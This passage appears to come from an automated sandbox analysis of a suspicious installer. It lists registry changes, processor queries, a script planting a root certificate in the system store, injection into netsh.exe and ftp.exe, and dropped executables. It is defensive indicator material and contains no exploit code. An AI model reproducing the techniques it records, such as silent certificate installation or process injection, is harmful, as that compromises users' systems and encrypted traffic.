| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\amd64\\FileSyncShell64.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30}\InprocServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{94269C4E-071A-4116-90E6-52E557067E4E}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\FileCoAuth.exe" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{2e7c0a19-0438-41e9-81e3-3ad3d64f55ba}\LocalServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{94269C4E-071A-4116-90E6-52E557067E4E}\LocalServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\InProcServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\amd64\\FileSyncShell64.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\FileCoAuthLib.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\FileCoAuth.exe" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E}\InprocServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\dcom.au3 | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\OneDrive.exe = "11000" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\OneDrive.exe = "11000" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Software\Microsoft\Internet Explorer\IESettingSync | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\OneDrive.exe = "11000" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\Interface\{F0AF7C30-EAE4-4644-961D-54E6E28708D6}\TypeLib\ = "{909A6CCD-6810-46C4-89DF-05BE7EB61E6C}" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Interface\{e9de26a1-51b2-47b4-b1bf-c87059cc02a7}\TypeLib\Version = "1.0" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Interface\{EA23A664-A558-4548-A8FE-A6B94D37C3CF}\ProxyStubClsid32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_CLASSES\INTERFACE\{1EDD003E-C446-43C5-8BA0-3778CC4792CC}\TYPELIB | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Interface\{0d4e4444-cb20-4c2b-b8b2-94e5656ecae8}\TypeLib | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\Interface\{C2FE84F5-E036-4A07-950C-9BFD3EAB983A}\TypeLib | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\TypeLib\{638805C3-4BA3-4AC8-8AAC-71A0BA2BC284}\1.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\FileCoAuth.exe\\1" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\Interface\{0776ae27-5ab9-4e18-9063-1836da63117a}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Interface\{02C98E2C-6C9F-49F8-9B57-3A6E1AA09A67}\ = "ISyncInformationLookupCallback" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\Interface\{e9de26a1-51b2-47b4-b1bf-c87059cc02a7}\TypeLib\ = "{909A6CCD-6810-46C4-89DF-05BE7EB61E6C}" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Interface\{390AF5A7-1390-4255-9BC9-935BFCFA5D57}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Interface\{B05D37A9-03A2-45CF-8850-F660DF0CBF07}\ = "IOneDriveInfoProvider" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Interface\{D0ED5C72-6197-4AAD-9B16-53FE461DD85C}\TypeLib | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30} | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{20894375-46AE-46E2-BAFD-CB38975CDCE6}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Interface\{F062BA81-ADFE-4A92-886A-23FD851D6406}\TypeLib\Version = "1.0" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\BannerNotificationHandler.BannerNotificationHandler\CurVer | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Interface\{B54E7079-90C9-4C62-A6B8-B2834C33A04A}\ProxyStubClsid32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Interface\{466F31F7-9892-477E-B189-FA5C59DE3603}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\NucleusNativeMessaging.NucleusNativeMessaging\ = "NucleusNativeMessaging Class" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\odopen\shell | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\SyncEngineStorageProviderHandlerProxy.SyncEngineStorageProviderHandlerProxy.1\CLSID | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{6bb93b4e-44d8-40e2-bd97-42dbcf18a40f}\ = "ToastActivator Class" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\Interface\{466F31F7-9892-477E-B189-FA5C59DE3603}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\ProgID | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Interface\{F0AF7C30-EAE4-4644-961D-54E6E28708D6} | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Interface\{22A68885-0FD9-42F6-9DED-4FB174DC7344}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\Interface\{9E1CD0DF-72E7-4284-9598-342C0A46F96B} | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\Interface\{1B71F23B-E61F-45C9-83BA-235D55F50CF9}\TypeLib\Version = "1.0" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{9AA2F32D-362A-42D9-9328-24A483E2CCC3}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Interface\{AF60000F-661D-472A-9588-F062F6DB7A0E}\ProxyStubClsid32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{7AFDFDDB-F914-11E4-8377-6C3BE50D980C}\InprocServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\Interface\{1EDD003E-C446-43C5-8BA0-3778CC4792CC}\TypeLib\Version = "1.0" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\Interface\{31508CC7-9BC7-494B-9D0F-7B1C7F144182}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\Interface\{79A2A54C-3916-41FD-9FAB-F26ED0BBA755} | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\FileSyncClient.AutoPlayHandler\shell\import\DropTarget | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\Interface\{0299ECA9-80B6-43C8-A79A-FB1C5F19E7D8}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\Interface\{5D5DD08F-A10E-4FEF-BCA7-E73E666FC66C}\TypeLib\Version = "1.0" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\Interface\{049FED7E-C3EA-4B66-9D92-10E8085D60FB}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Interface\{EA23A664-A558-4548-A8FE-A6B94D37C3CF} | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\Interface\{2692D1F2-2C7C-4AE0-8E73-8F37736C912D} | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Interface\{2EB31403-EBE0-41EA-AE91-A1953104EA55}\TypeLib | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Interface\{B05D37A9-03A2-45CF-8850-F660DF0CBF07} | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\Interface\{0f872661-c863-47a4-863f-c065c182858a} | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\Interface\{3A4E62AE-45D9-41D5-85F5-A45B77AB44E5} | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Interface\{2692D1F2-2C7C-4AE0-8E73-8F37736C912D} | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\Interface\{1EDD003E-C446-43C5-8BA0-3778CC4792CC}\ProxyStubClsid32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\Interface\{31508CC7-9BC7-494B-9D0F-7B1C7F144182}\ProxyStubClsid32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\FileSyncClient.FileSyncClient\CLSID | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Interface\{8D3F8F15-1DE1-4662-BF93-762EABE988B2}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\Interface\{944903E8-B03F-43A0-8341-872200D2DA9C}\TypeLib\Version = "1.0" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Interface\{385ED83D-B50C-4580-B2C3-9E64DBE7F511}\TypeLib | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_CLASSES\TYPELIB\{4B1C80DA-FA45-468F-B42B-46496BDBE0C5}\1.0\0\WIN32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\InprocServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\ShellFolder\FolderValueFlags = "40" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\FileSyncConfig.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}\ProgID\ = "StorageProviderUriSource.StorageProviderUriSource.1" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Interface\{3A4E62AE-45D9-41D5-85F5-A45B77AB44E5}\ProxyStubClsid32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\Interface\{22A68885-0FD9-42F6-9DED-4FB174DC7344}\ProxyStubClsid32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\TypeLib | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{389510b7-9e58-40d7-98bf-60b911cb0ea9}\VersionIndependentProgID | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\Interface\{e9de26a1-51b2-47b4-b1bf-c87059cc02a7}\TypeLib | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Interface\{ACDB5DB0-C9D5-461C-BAAA-5DCE0B980E40}\ProxyStubClsid32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Interface\{2F12C599-7AA5-407A-B898-09E6E4ED2D1E} | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{6bb93b4e-44d8-40e2-bd97-42dbcf18a40f}\LocalServer32\ = "\"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /cci" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\dcom.au3 | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (binary certificate blob omitted) | C:\Users\Admin\AppData\Local\Temp\dcom.au3 | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\Downloads\IObitUnlockerPortable.zip:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Set-up.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\ProgramData\AAKEGDAKEH.exe | N/A |
| N/A | N/A | C:\ProgramData\DGDBAKKJKK.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ftp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\help\fxcloud.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\Set-up.exe
"C:\Users\Admin\AppData\Local\Temp\Set-up.exe"
C:\Windows\SysWOW64\netsh.exe
C:\Windows\SysWOW64\netsh.exe
C:\Users\Admin\AppData\Local\Temp\dcom.au3
C:\Users\Admin\AppData\Local\Temp\dcom.au3
C:\ProgramData\AAKEGDAKEH.exe
"C:\ProgramData\AAKEGDAKEH.exe"
C:\ProgramData\DGDBAKKJKK.exe
"C:\ProgramData\DGDBAKKJKK.exe"
C:\Windows\SysWOW64\ftp.exe
